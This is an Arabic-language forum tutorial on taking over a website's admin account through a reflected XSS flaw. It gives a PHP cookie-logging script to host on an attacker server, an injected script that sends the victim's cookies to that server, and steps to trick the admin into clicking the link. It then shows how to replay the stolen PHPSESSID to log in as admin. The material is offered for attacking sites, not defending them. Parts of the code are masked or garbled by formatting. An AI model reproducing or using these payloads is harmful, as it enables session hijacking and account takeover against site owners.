بسم الله الرحمن الرحيم

شرح اختراق الموقع عن طريق تغرة اكس اس اس (xss)

الترغة هده منتشرة مثل تغرة السكيل بل تعتبر من تغرات الحقن

الطريقة تعتمد على سرقة الكوكيز الخاصة بالادمن والدخول للوحة

طبعا الكل يعرف كيف يتأكد من ان الموقع مصاب بالتغرة
غالبا تضع في الرابط او في مكان البحث الكود التالي


كود PHP:
>***************("test")</script
وطبعا في بعض الاحيان تحتاج الى تشفير الامر بالهيكس
والمواقع موجودة لتشفير بالهيكس
^_^
الطريقة تحتاج الى ثلاثة اشياء
ان يسمح الموقع المصاب بتسجيل الاعضاء + ملف بي اتش بي مرفوع على اي موقع + ملف تكست فارغ باسم log.txt (تقوم برفعه مع ملف البي اتش بي)
طبعا بعد التسجيل في الموقع
ندخل بالعضوية الخاصة فينا
ونقوم برفع الملف التالي من شل او استضافة تدعم رفع ملفات البي اتش بي

هذا هو الملف


كود PHP:
<?php 

function GetIP() 

    if (
getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        
$ip getenv("HTTP_CLIENT_IP"); 
    else if (
getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        
$ip getenv("HTTP_X_FORWARDED_FOR"); 
    else if (
getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        
$ip getenv("REMOTE_ADDR"); 
    else if (isset(
$_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown")) 
        
$ip $_SERVER['REMOTE_ADDR']; 
    else 
        
$ip "unknown"
    return(
$ip); 


function 
logData() 

    
$ipLog="log.txt"
    $****** = 
$_SERVER['QUERY_STRING']; 
    
$register_globals = (bool) ini_get('register_gobals'); 
    if (
$register_globals$ip getenv('REMOTE_ADDR'); 
    else 
$ip GetIP(); 

    
$rem_port $_SERVER['REMOTE_PORT']; 
    
$user_agent $_SERVER['HTTP_USER_AGENT']; 
    
$rqst_method $_SERVER['METHOD']; 
    
$rem_host $_SERVER['REMOTE_HOST']; 
    
$referer $_SERVER['HTTP_REFERER']; 
    
$date=date ("l dS of F Y h:i:s A"); 
    
$log=fopen("$ipLog""a+"); 

    if (
preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | ******:  $****** <br>"); 
    else 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |   Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | ******:  $****** \n\n"); 
    
fclose($log); 


logData(); 

?>
اوك الان رفعنا الملف على موقع مثلا
http://server.com/file.php
وهذا ملف اللوغ
htp://server.com/log.txt
والموقع المصاب هو
http://target.com/search.php

الان كل شيئ جهاز بقى فقط كود الحقن


كود PHP:
"><script ********=  "**********">********.********="http://server.com/file.php?******=" +   ********.******;********.********="http://www.target.com"</script> 
الان طريقة الاختراق تعتمد على ارسال كود الحقن الى الادمن (الكود الاخير)
طبعا في رسالة او على الاميل او اي شيئ
المهم لازم يضغط كليك على الرابط اللي سيكون في النهاية

كود PHP:
http://target.com/search.php?q="><script ********=  "**********">********.********="http://yoursite.com/whateveryouwant.php?******="  +  ********.******;********.********="http://www.whateversite.com"</script> 


تضع فقط كود الحقن بعد رابط الملف المصاب في الموقع وترسله الى الادمن
لما يدخل الادمن على الرابط ستجد الكوكيز في ملف اللوع log.txt اللي رفعنا مع ملف البي اتش بي
http:server.com/log.txt

مثال

كود:

كود PHP:
IPxxx.xxx.xxx.xxPORTxxxHOST:  |  AgentMozilla/5.0 (X11U;  Linux i686en-USrv:1.9.0.8Gecko/2009032711 Ubuntu/8.10 (intrepid)  Firefox/3.0.8 METHOD:  | REFhttp://target.com/search.php |  

DATETuesday 9th 2013f April 2013 05:04:07 PM | ******:  ******=PHPSESSID=889c6594db2541db1666cefca7537373 
طبعا اللي يهمنا في اللوغ هو
PHPSESSID=889c6594db2541db1666cefca7537373
السيشن اي دي
ومن خلالها نعدل على الكوكيز الخاص فينا باستعمال احدى ادوات تعديل الكوكيز
وبمجرد عمل رفريش تجد نفسك ادمن


بالتوفيق